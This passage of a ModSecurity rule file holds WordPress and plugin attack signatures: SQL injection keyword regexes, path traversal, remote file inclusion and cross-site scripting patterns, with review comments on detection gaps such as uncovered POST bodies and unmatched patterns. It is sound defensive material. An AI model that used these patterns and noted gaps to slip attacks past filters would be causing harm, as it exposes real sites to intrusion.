"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004657,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004658,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- 
xmlrpc.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2004659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE SecRule REQUEST_LINE "@contains /xmlrpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4039'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress 2.2 SQL Injection Attempt -- xmlrpc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005657,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005658,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005659,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005660,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 
WordPress SQL Injection Attempt -- wp-trackback.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005661,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005662,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3109'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005865) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005865,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005866) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005866,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005867,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005868) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005868,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005869) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII SecRule REQUEST_LINE "@contains /wp-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005869,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2005870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE SecRule REQUEST_LINE "@contains /wp-trackback.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005870,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21907'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress SQL Injection Attempt -- wp-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2008725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008725,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection',tag:'web-application-attack'" SecRule ARGS:newsletter "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Newsletter Plugin newsletter Parameter SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2009010) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure SecRule REQUEST_LINE "@contains /books/getConfig.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009010,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',tag:'web-application-attack',tag:'bugtraq,32966'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains book_id=" "chain" SecRule 
QUERY_STRING|REQUEST_BODY "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Plugin Page Flip Image Gallery getConfig.php book_id parameter Remote File Disclosure',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"
# NOTE(review): the "../" test above is the last link of chain 2009010 and lists
# no t: actions of its own. QUERY_STRING is exposed without URL decoding, so an
# encoded traversal ("..%2f") is caught only if the chain starter's
# transformations also apply to chained rules - confirm against the engine docs.

# (2010473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt
# Chain: request line contains the plugin script path AND "GET " AND the ABSPATH
# parameter matches. On a full match the critical anomaly score is added to
# tx.anomaly_score and the matched variable is recorded in a TX entry; "block"
# defers the disruptive action to the configured default.
# NOTE(review): ARGS:ABSPATH holds the parameter value only, yet the pattern
# begins with the literal "ABSPATH=". A value that is simply a remote URL would
# not match; this looks like a carry-over from a URI-based signature - confirm.
# The "GET " link also leaves the same parameter sent in a POST body uncovered.
SecRule REQUEST_LINE "@contains /js/wptable-tinymce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010473,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:ABSPATH "(?i:ABSPATH\s*=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2010728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt
# Chain: request line contains /wp-admin/admin.php AND the query string or body
# contains "page=" AND the final regex matches one of four listed plugin files.
# NOTE(review): the final regex expects "/wp-admin/admin.php" followed by "page="
# inside QUERY_STRING or REQUEST_BODY. The script path normally sits in the
# request line rather than the query string, so this link may seldom match -
# verify with a sample request before relying on the rule for CVE-2009-2334.
SecRule REQUEST_LINE "@contains /wp-admin/admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010728,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt',tag:'web-application-attack',tag:'cve,2009-2334'"
    SecRule QUERY_STRING|REQUEST_BODY "@contains page=" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Fwp\x2Dadmin\x2Fadmin\x2Ephp.+page\x3D(\x2Fcollapsing\x2Darchives\x2Foptions\x2Etxt|akismet\x2Freadme\x2Etxt|related\x2Dways\x2Dto\x2Dtake\x2Daction\x2Foptions\x2Ephp|wp\x2Dsecurity\x2Dscan\x2Fsecurityscan\x2Ephp))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress wp-admin/admin.php Module Configuration Security Bypass Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011006) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt
# Chain: request line contains the media-rss.php path AND "GET " AND the mode
# parameter contains one of the listed script/event-handler keywords.
# NOTE(review): the ARGS:mode pattern is an unanchored, case-insensitive keyword
# list, so any value containing "script", "onload", etc. as a substring adds the
# critical score. Review audit-log hits for false positives when tuning.
SecRule REQUEST_LINE "@contains /wp-content/plugins/nextgen-gallery/xml/media-rss.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011006,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2010-1186'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mode "(?i:(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress NextGEN Gallery Plugin Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection Attempt
# Chain: request line contains the cplphoto.php path AND "GET " AND the postid
# value contains SELECT followed later by FROM (case-insensitive).
SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011044,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:postid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter SELECT FROM SQL Injection
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011045,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011071) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011071,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:postid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'" # (2011046) SpiderLabs Research 
(SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt
# Chain: request line contains the cplphoto.php path AND "GET " AND the postid
# value contains INSERT followed later by INTO (case-insensitive). On a full
# match the critical anomaly score is added to tx.anomaly_score and the matched
# variable is recorded in a TX entry; "block" defers the disruptive action to the
# configured default.
# The "GET " link means the same parameter sent in a POST body is not covered.
SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011046,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:postid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt
# Same chain shape as 2011046, with UPDATE ... SET as the keyword pair.
SecRule REQUEST_LINE "@contains /wp-content/plugins/cpl/cplphoto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11458'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:postid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Copperleaf Photolog postid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011107) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt
# Chain: request line contains the tagcloud.swf path AND "mode=tags" AND the
# tagcloud parameter matches the keyword pattern.
# NOTE(review): ARGS:tagcloud holds the parameter value only, yet the pattern
# requires the literal "tagcloud=" before the keyword. A value that carries the
# script or event-handler text directly would not match; this looks like a
# carry-over from a URI-based signature - confirm with a test request.
SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-cumulus/tagcloud.swf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011107,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains mode=tags" "chain"
    SecRule ARGS:tagcloud "(?i:tagcloud\x3D.+(script|alert|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP-Cumulus Plugin tagcloud.swf Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

# (2011942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt
# Chain: request line contains the vodpod_gallery_thumbs.php path AND the gid
# parameter matches the keyword pattern (no request-method link in this chain).
# NOTE(review): same caveat as 2011107 - the pattern requires the literal "gid="
# inside the value of ARGS:gid, so a plain payload in gid may not match. Confirm.
SecRule REQUEST_LINE "@contains /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011942,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',tag:'web-application-attack'"
    SecRule ARGS:gid "(?i:gid\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Vodpod Video Gallery Plugin gid Cross-Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/WORDPRESS-%{matched_var_name}=%{matched_var}'"

